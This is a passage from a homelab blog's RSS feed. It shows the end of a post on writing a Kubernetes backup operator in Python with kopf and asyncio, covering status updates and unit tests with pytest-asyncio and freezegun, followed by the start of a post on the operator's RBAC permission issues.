</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">return</span> wake_reasons
</span></span></code></pre></div><p>As I&rsquo;ve noted before, I&rsquo;m using Python&rsquo;s asyncio module, so instead of threads,
I&rsquo;m using coroutines. Luckily, the Python standard library already provides the
means to wait for multiple tasks and even tell me which task is done waiting
when the function returns. So here, I&rsquo;m creating two tasks. One is waiting on
the given <code>waittime</code>. This is the difference between the current time and the
next scheduled backup, in seconds. The second one is waiting on the condition
I mentioned previously. This condition will be notified by the handler for the
HomelabBackupConfig when that resource changes. This is necessary because the
daemon might need to adjust its wait time if the schedule for backups has changed.</p>
<p>Finally, I&rsquo;m checking which task finished waiting, and return a list of
enums to tell the caller why it woke up, to take different actions.</p>
<p>Then there&rsquo;s the main loop of the daemon:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-python" data-lang="python"><span style="display:flex;"><span><span style="color:#66d9ef">async</span> <span style="color:#66d9ef">def</span> <span style="color:#a6e22e">homelab_service_daemon</span>(name, namespace, spec, memo, stopped):
</span></span><span style="display:flex;"><span>    logging<span style="color:#f92672">.</span>info(<span style="color:#e6db74">f</span><span style="color:#e6db74">&#34;Launching daemon for </span><span style="color:#e6db74">{</span>namespace<span style="color:#e6db74">}</span><span style="color:#e6db74">/</span><span style="color:#e6db74">{</span>name<span style="color:#e6db74">}</span><span style="color:#e6db74">.&#34;</span>)
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">while</span> <span style="color:#f92672">not</span> stopped:
</span></span><span style="display:flex;"><span>        logging<span style="color:#f92672">.</span>debug(<span style="color:#e6db74">f</span><span style="color:#e6db74">&#34;In main loop of </span><span style="color:#e6db74">{</span>namespace<span style="color:#e6db74">}</span><span style="color:#e6db74">/</span><span style="color:#e6db74">{</span>name<span style="color:#e6db74">}</span><span style="color:#e6db74"> with spec: </span><span style="color:#e6db74">{</span>spec<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span>)
</span></span><span style="display:flex;"><span>        next_run <span style="color:#f92672">=</span> backupconfig<span style="color:#f92672">.</span>get_next_service_time()
</span></span><span style="display:flex;"><span>        wait_time <span style="color:#f92672">=</span> next_run <span style="color:#f92672">-</span> datetime<span style="color:#f92672">.</span>datetime<span style="color:#f92672">.</span>now(datetime<span style="color:#f92672">.</span>timezone<span style="color:#f92672">.</span>utc)
</span></span><span style="display:flex;"><span>        <span style="color:#66d9ef">await</span> wait_for(wait_time<span style="color:#f92672">.</span>total_seconds(), memo<span style="color:#f92672">.</span>backup_conf_cond)
</span></span><span style="display:flex;"><span>    logging<span style="color:#f92672">.</span>info(<span style="color:#e6db74">f</span><span style="color:#e6db74">&#34;Finished daemon for </span><span style="color:#e6db74">{</span>namespace<span style="color:#e6db74">}</span><span style="color:#e6db74">/</span><span style="color:#e6db74">{</span>name<span style="color:#e6db74">}</span><span style="color:#e6db74">.&#34;</span>)
</span></span></code></pre></div><p>This doesn&rsquo;t do much at the moment, as I haven&rsquo;t implemented the backups
themselves yet. It runs in an endless loop, checking the <code>stopped</code> variable,
which will be set to <code>True</code> by kopf if the HomelabServiceBackup this daemon is
handling is deleted or the operator is stopped. Kopf will also throw a
<a href="https://docs.python.org/3/library/asyncio-exceptions.html#asyncio.CancelledError">CancelledError</a>
into the coroutine in those cases, so the daemon will also be stopped when it
is currently waiting.</p>
<p>The waiting time is computed with the <code>get_next_service_time</code> function I discussed
above.</p>
<h2 id="implementing-status-updates">Implementing status updates</h2>
<p>The goal which triggered this blog post was me finally getting the scheduled
triggering and updates of the HomelabServiceBackup&rsquo;s status implemented, which
was my first change of the cluster status via the operator.</p>
<p>My goal was to have each daemon update a field in its HomelabServiceBackup
resource with the scheduled time of the next backup, which would ultimately
look like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">status</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">nextBackup</span>: <span style="color:#e6db74">&#34;2024-05-25T18:30:00+00:00&#34;</span>
</span></span></code></pre></div><p>The <code>status.nextBackup</code> field is what I was interested in setting. I first
looked at the <a href="https://github.com/kubernetes-client/python">Kubernetes Python Client</a>,
but found that it did not support asyncio. But I quickly found
<a href="https://github.com/tomplus/kubernetes_asyncio">kubernetes_asyncio</a>.
An interesting thing I learned while looking at these two libraries is that they
were, for the most part, not hand-written. Instead, they use the <a href="https://github.com/openapitools/openapi-generator">openapi-generator</a>
to automatically generate the API code from the Kubernetes API definition. Which
is pretty cool to see, to be honest. It leads to boatloads of repeated code, but
the alternative of writing all that code by hand probably doesn&rsquo;t bear thinking
about.</p>
<p>Of course, one of the downsides of using the Python API client was that it would
not have API support for the CRDs I&rsquo;ve written for my own cluster. Instead,
I needed to use the generic <a href="https://github.com/kubernetes-client/python/blob/master/kubernetes/docs/CustomObjectsApi.md">CustomObjectsAPI</a>.</p>
<p>Initially, because I wanted to specifically update the status of my resources,
I looked at the <a href="https://github.com/kubernetes-client/python/blob/master/kubernetes/docs/CustomObjectsApi.md#patch_namespaced_custom_object_status">patch_namespaced_custom_object_status</a>
API. But running that API against a resource which did not have the status set
yet just returns a 404. It took me a <em>long while</em> to realize that the 404 was
not due to an error on my end, but simply because the resource needed to have
a status already for the status API to work.</p>
<p>So instead, I reached for the <a href="https://github.com/kubernetes-client/python/blob/master/kubernetes/docs/CustomObjectsApi.md#patch_namespaced_custom_object">patch_namespaced_custom_object</a>
API. That, too, had a lot of issues. I initially thought I was the first person
to use the Python API package for accessing custom objects.
All the examples I could find stated that this should work:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-python" data-lang="python"><span style="display:flex;"><span><span style="color:#f92672">import</span> asyncio
</span></span><span style="display:flex;"><span><span style="color:#f92672">from</span> kubernetes_asyncio <span style="color:#f92672">import</span> client, config
</span></span><span style="display:flex;"><span><span style="color:#f92672">from</span> kubernetes_asyncio.client.api_client <span style="color:#f92672">import</span> ApiClient
</span></span><span style="display:flex;"><span><span style="color:#f92672">from</span> pprint <span style="color:#f92672">import</span> pprint
</span></span><span style="display:flex;"><span><span style="color:#f92672">import</span> json
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">async</span> <span style="color:#66d9ef">def</span> <span style="color:#a6e22e">main</span>():
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">await</span> config<span style="color:#f92672">.</span>load_kube_config()
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">async</span> <span style="color:#66d9ef">with</span> ApiClient() <span style="color:#66d9ef">as</span> api:
</span></span><span style="display:flex;"><span>        mine <span style="color:#f92672">=</span> client<span style="color:#f92672">.</span>CustomObjectsApi(api)
</span></span><span style="display:flex;"><span>        res <span style="color:#f92672">=</span> <span style="color:#66d9ef">await</span> mine<span style="color:#f92672">.</span>patch_namespaced_custom_object(<span style="color:#e6db74">&#34;mei-home.net&#34;</span>, <span style="color:#e6db74">&#34;v1alpha1&#34;</span>,
</span></span><span style="display:flex;"><span>                <span style="color:#e6db74">&#34;backups&#34;</span>, <span style="color:#e6db74">&#34;homelabservicebackups&#34;</span>, <span style="color:#e6db74">&#34;test-service-backup&#34;</span>,
</span></span><span style="display:flex;"><span>                body<span style="color:#f92672">=</span>{<span style="color:#e6db74">&#34;status&#34;</span>:{<span style="color:#e6db74">&#34;lastBackup&#34;</span>: {<span style="color:#e6db74">&#34;state&#34;</span>:<span style="color:#ae81ff">1</span>, <span style="color:#e6db74">&#34;timestamp&#34;</span>:<span style="color:#e6db74">&#34;foobar&#34;</span>}}}
</span></span><span style="display:flex;"><span>                )
</span></span><span style="display:flex;"><span>        pprint(res)
</span></span><span style="display:flex;"><span>asyncio<span style="color:#f92672">.</span>run(main())
</span></span></code></pre></div><p>But it did not. Instead, I kept getting errors like this back:</p>
<pre tabindex="0"><code>kubernetes_asyncio.client.exceptions.ApiException: (415)
Reason: Unsupported Media Type
HTTP response body: {&#34;kind&#34;:&#34;Status&#34;,&#34;apiVersion&#34;:&#34;v1&#34;,&#34;metadata&#34;:{},&#34;status&#34;:&#34;Failure&#34;,
&#34;message&#34;:&#34;the body of the request was in an unknown format - accepted media types
include: application/json-patch+json, application/merge-patch+json,
application/apply-patch+yaml&#34;,
&#34;reason&#34;:&#34;UnsupportedMediaType&#34;,
&#34;code&#34;:415}
</code></pre><p>I finally found <a href="https://github.com/tomplus/kubernetes_asyncio/issues/68">this bug</a>.
It seems to indicate that the issue is a wrong media type getting set in the
<code>content-type</code> header. This lead me to the <a href="https://github.com/tomplus/kubernetes_asyncio/blob/master/examples/patch.py">examples</a>
file, which shows that a specific content type could be forced, by adding
<code>_content_type='application/merge-patch+json'</code> as a parameter to the
<code>patch_namespaced_custom_object</code> call. With that addition, I was finally able
to properly update the time for the next backup in the status, by adding these
lines to the <code>homelab_service_daemon</code> function from before:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-python" data-lang="python"><span style="display:flex;"><span>status_body <span style="color:#f92672">=</span> {
</span></span><span style="display:flex;"><span>    <span style="color:#e6db74">&#34;status&#34;</span>: {
</span></span><span style="display:flex;"><span>        <span style="color:#e6db74">&#34;nextBackup&#34;</span>: next_run<span style="color:#f92672">.</span>isoformat()
</span></span><span style="display:flex;"><span>    }
</span></span><span style="display:flex;"><span>}
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">await</span> kubeapi<span style="color:#f92672">.</span>patch_mei_home_custom_object(
</span></span><span style="display:flex;"><span>    namespace, kubeapi<span style="color:#f92672">.</span>HOMELABSERVICEBACKUP_PLURAL, name, status_body)
</span></span></code></pre></div><p>The <code>patch_mei_home_custom_object</code> function is just a thin wrapper around
the <code>patch_namespaced_custom_object</code> function from above.</p>
<h2 id="some-notes-on-testing">Some notes on testing</h2>
<p>Writing UTs was not always simple here. First of all, I needed to employ a lot
of mocks to remove any attempted k8s cluster access. I&rsquo;m seriously considering
buying some additional Pis and setting up a test cluster. &#x1f601;</p>
<p>My first generic issue was: How do I even properly unit test asyncio code?
Luckily, that issue was easy to answer, at least in the abstract: I used
<a href="https://github.com/pytest-dev/pytest-asyncio">pytest-asyncio</a>. It allows me to
add <code>@pytest.mark.asyncio</code> at the top of my test function, or entire test classes,
and the pytest plugin will automatically setup the event loop infrastructure
and execute the test functions with it.</p>
<p>Still, I had a particular challenge with testing the waiting code, specifically
when it comes to testing whether the Condition properly fires. As a reminder,
here is what the code looks like:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-python" data-lang="python"><span style="display:flex;"><span><span style="color:#66d9ef">async</span> <span style="color:#66d9ef">def</span> <span style="color:#a6e22e">cond_waiter</span>(cond):
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">async</span> <span style="color:#66d9ef">with</span> cond:
</span></span><span style="display:flex;"><span>        <span style="color:#66d9ef">await</span> cond<span style="color:#f92672">.</span>wait()
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">async</span> <span style="color:#66d9ef">def</span> <span style="color:#a6e22e">wait_for</span>(waittime, update_condition):
</span></span><span style="display:flex;"><span>    cond_task <span style="color:#f92672">=</span> asyncio<span style="color:#f92672">.</span>create_task(cond_waiter(update_condition),
</span></span><span style="display:flex;"><span>                                    name<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;condwait&#34;</span>)
</span></span><span style="display:flex;"><span>    sleep_task <span style="color:#f92672">=</span> asyncio<span style="color:#f92672">.</span>create_task(asyncio<span style="color:#f92672">.</span>sleep(waittime), name<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;sleepwait&#34;</span>)
</span></span><span style="display:flex;"><span>    done, pending <span style="color:#f92672">=</span> <span style="color:#66d9ef">await</span> asyncio<span style="color:#f92672">.</span>wait([cond_task, sleep_task],
</span></span><span style="display:flex;"><span>                                       return_when<span style="color:#f92672">=</span>asyncio<span style="color:#f92672">.</span>FIRST_COMPLETED)
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">for</span> p <span style="color:#f92672">in</span> pending:
</span></span><span style="display:flex;"><span>        p<span style="color:#f92672">.</span>cancel()
</span></span><span style="display:flex;"><span>    wake_reasons <span style="color:#f92672">=</span> []
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">for</span> d <span style="color:#f92672">in</span> done:
</span></span><span style="display:flex;"><span>        <span style="color:#66d9ef">if</span> d<span style="color:#f92672">.</span>get_name() <span style="color:#f92672">==</span> <span style="color:#e6db74">&#34;condwait&#34;</span>:
</span></span><span style="display:flex;"><span>            wake_reasons<span style="color:#f92672">.</span>append(WakeupReason<span style="color:#f92672">.</span>SCHEDULE_UPDATE)
</span></span><span style="display:flex;"><span>        <span style="color:#66d9ef">elif</span> d<span style="color:#f92672">.</span>get_name() <span style="color:#f92672">==</span> <span style="color:#e6db74">&#34;sleepwait&#34;</span>:
</span></span><span style="display:flex;"><span>            wake_reasons<span style="color:#f92672">.</span>append(WakeupReason<span style="color:#f92672">.</span>TIMER)
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">return</span> wake_reasons
</span></span></code></pre></div><p>And here is my initial attempt at the test code:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-python" data-lang="python"><span style="display:flex;"><span><span style="color:#f92672">import</span> asyncio
</span></span><span style="display:flex;"><span><span style="color:#f92672">from</span> unittest.mock <span style="color:#f92672">import</span> AsyncMock, Mock
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">import</span> hl_backup_operator.homelab_service_backup <span style="color:#66d9ef">as</span> sut
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#a6e22e">@pytest.mark.asyncio</span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">class</span> <span style="color:#a6e22e">TestCondWait</span>:
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">async</span> <span style="color:#66d9ef">def</span> <span style="color:#a6e22e">test_cond_wait_works</span>(self):
</span></span><span style="display:flex;"><span>        cond <span style="color:#f92672">=</span> asyncio<span style="color:#f92672">.</span>Condition()
</span></span><span style="display:flex;"><span>        test_task <span style="color:#f92672">=</span> asyncio<span style="color:#f92672">.</span>create_task(sut<span style="color:#f92672">.</span>wait_for(<span style="color:#ae81ff">15</span>, cond))
</span></span><span style="display:flex;"><span>        <span style="color:#66d9ef">async</span> <span style="color:#66d9ef">with</span> cond:
</span></span><span style="display:flex;"><span>            cond<span style="color:#f92672">.</span>notify_all()
</span></span><span style="display:flex;"><span>        <span style="color:#66d9ef">await</span> test_task
</span></span><span style="display:flex;"><span>        res <span style="color:#f92672">=</span> test_task<span style="color:#f92672">.</span>result()
</span></span><span style="display:flex;"><span>        <span style="color:#66d9ef">assert</span> res <span style="color:#f92672">==</span> [sut<span style="color:#f92672">.</span>WakeupReason<span style="color:#f92672">.</span>SCHEDULE_UPDATE]
</span></span></code></pre></div><p>I&rsquo;m trying to test whether the Condition works properly. My thinking is that
the code path goes like this:</p>
<ol>
<li>[testcode]: Creates an async task ready to run, executing the function under
test.</li>
<li>[appcode]: Runs until it hits the <code>asyncio.wait</code> line</li>
<li>[appcode]: Now waits for either the timer to expire or the Condition to be
triggered, hands back execution to the [testcode]</li>
<li>[testcode]: Executes the <code>cond.notify_all</code> function</li>
<li>[testcode]: Awaits the task, handing execution back to [appcode]</li>
<li>[appcode]: Gets notified in <code>cond_waiter</code> and runs to completion</li>
</ol>
<p>But that was not what happened. Sprinkling in some <code>print</code> statements, I found
that the test code continues running after the <code>create_task</code> call, straight
through the <code>notify_call</code> call. The first time the wait_for gets to do anything
is when the test code hits the <code>await test_task</code> line. And only then does it
reach the <code>await cond.wait</code> line. But at this point, the test code already
executed the <code>notify_all</code>, and the <code>wait_for</code> function does not return until the
timer, of the <code>sleepwait</code> task, is hit, resulting in a failed UT.</p>
<p>The only way I found around this issue is to have the test code explicitly hand
execution off. I did this by introducing a <code>await asyncio.sleep(0.05)</code> before
the <code>async with cond:</code> line of the test function.
Then the <code>wait_for</code> function gets to run until it hits the <code>await cond.wait</code> and
gets properly notified and the test reliably succeeds.</p>
<p>This was, yet again, a case where the UT ends up being more complicated than the
actual code.</p>
<p>One more issue I hit had to do with the merciless advance of time. Have another
look at the <code>homelab_service_daemon</code> function:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-python" data-lang="python"><span style="display:flex;"><span><span style="color:#66d9ef">async</span> <span style="color:#66d9ef">def</span> <span style="color:#a6e22e">homelab_service_daemon</span>(name, namespace, spec, memo, stopped):
</span></span><span style="display:flex;"><span>    logging<span style="color:#f92672">.</span>info(<span style="color:#e6db74">f</span><span style="color:#e6db74">&#34;Launching daemon for </span><span style="color:#e6db74">{</span>namespace<span style="color:#e6db74">}</span><span style="color:#e6db74">/</span><span style="color:#e6db74">{</span>name<span style="color:#e6db74">}</span><span style="color:#e6db74">.&#34;</span>)
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">while</span> <span style="color:#f92672">not</span> stopped:
</span></span><span style="display:flex;"><span>        logging<span style="color:#f92672">.</span>debug(<span style="color:#e6db74">f</span><span style="color:#e6db74">&#34;In main loop of </span><span style="color:#e6db74">{</span>namespace<span style="color:#e6db74">}</span><span style="color:#e6db74">/</span><span style="color:#e6db74">{</span>name<span style="color:#e6db74">}</span><span style="color:#e6db74"> with spec: </span><span style="color:#e6db74">{</span>spec<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span>)
</span></span><span style="display:flex;"><span>        next_run <span style="color:#f92672">=</span> backupconfig<span style="color:#f92672">.</span>get_next_service_time()
</span></span><span style="display:flex;"><span>        wait_time <span style="color:#f92672">=</span> next_run <span style="color:#f92672">-</span> datetime<span style="color:#f92672">.</span>datetime<span style="color:#f92672">.</span>now(datetime<span style="color:#f92672">.</span>timezone<span style="color:#f92672">.</span>utc)
</span></span><span style="display:flex;"><span>        status_body <span style="color:#f92672">=</span> {
</span></span><span style="display:flex;"><span>            <span style="color:#e6db74">&#34;status&#34;</span>: {
</span></span><span style="display:flex;"><span>                <span style="color:#e6db74">&#34;nextBackup&#34;</span>: next_run<span style="color:#f92672">.</span>isoformat()
</span></span><span style="display:flex;"><span>            }
</span></span><span style="display:flex;"><span>        }
</span></span><span style="display:flex;"><span>        <span style="color:#66d9ef">await</span> kubeapi<span style="color:#f92672">.</span>patch_mei_home_custom_object(
</span></span><span style="display:flex;"><span>            namespace, kubeapi<span style="color:#f92672">.</span>HOMELABSERVICEBACKUP_PLURAL, name, status_body)
</span></span><span style="display:flex;"><span>        <span style="color:#66d9ef">await</span> wait_for(wait_time<span style="color:#f92672">.</span>total_seconds(), memo<span style="color:#f92672">.</span>backup_conf_cond)
</span></span><span style="display:flex;"><span>    logging<span style="color:#f92672">.</span>info(<span style="color:#e6db74">f</span><span style="color:#e6db74">&#34;Finished daemon for </span><span style="color:#e6db74">{</span>namespace<span style="color:#e6db74">}</span><span style="color:#e6db74">/</span><span style="color:#e6db74">{</span>name<span style="color:#e6db74">}</span><span style="color:#e6db74">.&#34;</span>)
</span></span></code></pre></div><p>It has to compute the waiting time as the difference between the current time
and the time of the next scheduled backup. But how to handle <code>datetime.now</code> in
UTs? I initially tried to do this with a bit of fuzziness when comparing the
arguments handed to the mocked <code>wait_for</code> with the expected wait time, but that
seemed a bit too brittle.</p>
<p><a href="https://github.com/spulec/freezegun">Freezegun</a> to the rescue. It provides a
nice API to patch <code>datetime.now</code> (and several other related functions) so that
it always returns a deterministic value.
Using it in a UT to verify that <code>homelab_service_daemon</code> calls <code>wait_for</code> as
expected could look like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-python" data-lang="python"><span style="display:flex;"><span><span style="color:#a6e22e">@pytest.fixture</span>()
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">def</span> <span style="color:#a6e22e">mock_wait_for</span>(self, mocker):
</span></span><span style="display:flex;"><span>    wait_for_mock <span style="color:#f92672">=</span> AsyncMock(spec<span style="color:#f92672">=</span>sut<span style="color:#f92672">.</span>wait_for)
</span></span><span style="display:flex;"><span>    mocker<span style="color:#f92672">.</span>patch(<span style="color:#e6db74">&#39;hl_backup_operator.homelab_service_backup.wait_for&#39;</span>,
</span></span><span style="display:flex;"><span>                  side_effect<span style="color:#f92672">=</span>wait_for_mock)
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">return</span> wait_for_mock
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">async</span> <span style="color:#66d9ef">def</span> <span style="color:#a6e22e">test_daemon_waits_correctly</span>(self, mocker, mock_wait_for):
</span></span><span style="display:flex;"><span>    mock_memo <span style="color:#f92672">=</span> Mock()
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>    mock_stopped <span style="color:#f92672">=</span> Mock()
</span></span><span style="display:flex;"><span>    mock_stopped_bool <span style="color:#f92672">=</span> Mock(side_effect<span style="color:#f92672">=</span>[<span style="color:#66d9ef">False</span>, <span style="color:#66d9ef">True</span>])
</span></span><span style="display:flex;"><span>    mock_stopped<span style="color:#f92672">.</span><span style="color:#a6e22e">__bool__</span> <span style="color:#f92672">=</span> mock_stopped_bool
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>    time_now <span style="color:#f92672">=</span> datetime(year<span style="color:#f92672">=</span><span style="color:#ae81ff">2024</span>, month<span style="color:#f92672">=</span><span style="color:#ae81ff">5</span>, day<span style="color:#f92672">=</span><span style="color:#ae81ff">22</span>, hour<span style="color:#f92672">=</span><span style="color:#ae81ff">19</span>, minute<span style="color:#f92672">=</span><span style="color:#ae81ff">12</span>,
</span></span><span style="display:flex;"><span>                        second<span style="color:#f92672">=</span><span style="color:#ae81ff">10</span>, tzinfo<span style="color:#f92672">=</span>timezone<span style="color:#f92672">.</span>utc)
</span></span><span style="display:flex;"><span>    time_trigger <span style="color:#f92672">=</span> datetime(year<span style="color:#f92672">=</span><span style="color:#ae81ff">2024</span>, month<span style="color:#f92672">=</span><span style="color:#ae81ff">5</span>, day<span style="color:#f92672">=</span><span style="color:#ae81ff">22</span>, hour<span style="color:#f92672">=</span><span style="color:#ae81ff">19</span>, minute<span style="color:#f92672">=</span><span style="color:#ae81ff">12</span>,
</span></span><span style="display:flex;"><span>                            second<span style="color:#f92672">=</span><span style="color:#ae81ff">12</span>, tzinfo<span style="color:#f92672">=</span>timezone<span style="color:#f92672">.</span>utc)
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>    mock_next_service_time <span style="color:#f92672">=</span> Mock(return_value<span style="color:#f92672">=</span>time_trigger)
</span></span><span style="display:flex;"><span>    mocker<span style="color:#f92672">.</span>patch(
</span></span><span style="display:flex;"><span>        <span style="color:#e6db74">&#39;hl_backup_operator.homelab_backup_config.get_next_service_time&#39;</span>,
</span></span><span style="display:flex;"><span>        side_effect<span style="color:#f92672">=</span>mock_next_service_time)
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">with</span> freezegun<span style="color:#f92672">.</span>freeze_time(time_now):
</span></span><span style="display:flex;"><span>        <span style="color:#66d9ef">await</span> sut<span style="color:#f92672">.</span>homelab_service_daemon(<span style="color:#e6db74">&#34;tests&#34;</span>, <span style="color:#e6db74">&#34;testns&#34;</span>, {}, mock_memo,
</span></span><span style="display:flex;"><span>                                          mock_stopped)
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>    mock_wait_for<span style="color:#f92672">.</span>assert_awaited_once_with(<span style="color:#ae81ff">2</span>, mock_memo<span style="color:#f92672">.</span>backup_conf_cond)
</span></span></code></pre></div><p>I&rsquo;m mocking away both, the <code>wait_for</code> and <code>get_next_service_time</code> functions,
and I&rsquo;m also defining two fixed times, one &ldquo;current&rdquo; time, and one trigger time.
In the <code>with freezegun.freeze_time(time_now)</code> context, <code>datetime.now</code> will now
reliably always return <code>time_now</code> instead of the actual current time. And with
that, I don&rsquo;t need to rely on any fuzziness when testing time-related
functionality.</p>
<h2 id="next-steps">Next steps</h2>
<p>After I&rsquo;m finally happy with the groundwork, I still need to implement a couple
of features before starting with the implementation of the backup Jobs
themselves.
The first one is proper handling of the case where there is no HomelabBackupConfig
configured. Currently, the <code>homelab_service_daemon</code> function would crash, because
<code>get_next_service_time</code> would return <code>None</code>, due to not having any configured
schedule. That is easily fixable by extending the waiting time to &ldquo;forever&rdquo;.
With the Condition mechanism already in place, the daemons will be woken up once
a HomelabBackupConfig appears and can then return to the right schedule.</p>
<p>The second feature currently missing is mostly for testing purposes. Right now,
I&rsquo;m only able to centrally set the schedule, which would be applicable for all
service daemons. This is bound to become cumbersome once I want to start testing
the Job creation and monitoring, so I will want the possibility to trigger a
single service daemon&rsquo;s backup immediately. I will likely introduce another
parameter into the HomelabServiceBackup CRD which makes the daemon trigger
a backup immediately.</p>
<p>Alright, that&rsquo;s all I have to say for now. This is my first &ldquo;programming&rdquo; post
on this blog, and I&rsquo;m honestly not sure how it came out. Were you actually
able to follow, or was it a confused mess? Was it actually interesting to read?
I&rsquo;d be glad for some feedback, e.g. via my <a href="https://social.mei-home.net/@mmeier">Fediverse account</a>.</p>
]]></content:encoded>
    </item>
    <item>
      <title>Homelab Backup Operator Part I: RBAC permission issues</title>
      <link>https://blog.mei-home.net/posts/backup-operator-1-rbac-issues/</link>
      <pubDate>Sun, 12 May 2024 20:40:59 +0200</pubDate>
      <guid>https://blog.mei-home.net/posts/backup-operator-1-rbac-issues/</guid>
      <description>I ran into some issues with the RBAC permissions for my operator</description>
      <content:encoded><![CDATA[<p>As I&rsquo;ve mentioned in my <a href="https://blog.mei-home.net/posts/k8s-migration-12-backup-issues/">last k8s migration post</a>,
I&rsquo;m working on writing a Homelab backup operator for my Kubernetes cluster.
And I&rsquo;ve run into some RBAC/permission issues I can&rsquo;t quite figure out. So let&rsquo;s
see whether writing about it helps. &#x1f642;</p>
<p>First, a short overview of the plan. I&rsquo;m using the <a href="https://github.com/nolar/kopf">kopf</a>
framework to build a Kubernetes operator. This operator&rsquo;s main goal is to handle
HomelabServiceBackup resources. These will contain a list of PersitentVolumeClaims
and S3 buckets which need to be backed up. I intend for there to be one
HomelabServiceBackup object for every service, located in the service&rsquo;s Namespace.</p>
<p>At the same time, I started out with defining a HomelabBackupConfig resource.
This will contain some configs which will be common among all service backups,
things like the hostname of the S3 server to store the backups and the image to
be used for the backup jobs.
There will only ever be one instance of this custom resource, and it should
always reside in the Namespace of the operator itself. At the same time, there
should also only ever be one operator for the entire k8s cluster.</p>
<p>This all seemed sensible to me until this afternoon, which was when I had finally
done all the yak-shaving all new projects need, creation of the repo, config of
the CI for image generation and UTs and such things. And I finally had a container
image I could run, with a very simple implementation:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-python" data-lang="python"><span style="display:flex;"><span><span style="color:#f92672">import</span> kopf
</span></span><span style="display:flex;"><span><span style="color:#f92672">import</span> logging
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#a6e22e">@kopf.on.create</span>(<span style="color:#e6db74">&#39;homelabbackupconfigs&#39;</span>)
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">def</span> <span style="color:#a6e22e">create_handler</span>(spec, status, meta, <span style="color:#f92672">**</span>kwargs):
</span></span><span style="display:flex;"><span>    logging<span style="color:#f92672">.</span>info(<span style="color:#e6db74">f</span><span style="color:#e6db74">&#34;Create handler called with meta: </span><span style="color:#e6db74">{</span>meta<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span>)
</span></span><span style="display:flex;"><span>    logging<span style="color:#f92672">.</span>info(<span style="color:#e6db74">f</span><span style="color:#e6db74">&#34;Create handler called with spec: </span><span style="color:#e6db74">{</span>spec<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span>)
</span></span><span style="display:flex;"><span>    logging<span style="color:#f92672">.</span>info(<span style="color:#e6db74">f</span><span style="color:#e6db74">&#34;Create handler called with status: </span><span style="color:#e6db74">{</span>status<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span>)
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#a6e22e">@kopf.on.resume</span>(<span style="color:#e6db74">&#39;homelabbackupconfigs&#39;</span>)
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">def</span> <span style="color:#a6e22e">resume_handler</span>(spec, status, meta, <span style="color:#f92672">**</span>kwargs):
</span></span><span style="display:flex;"><span>    logging<span style="color:#f92672">.</span>info(<span style="color:#e6db74">f</span><span style="color:#e6db74">&#34;Resume handler called with meta: </span><span style="color:#e6db74">{</span>meta<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span>)
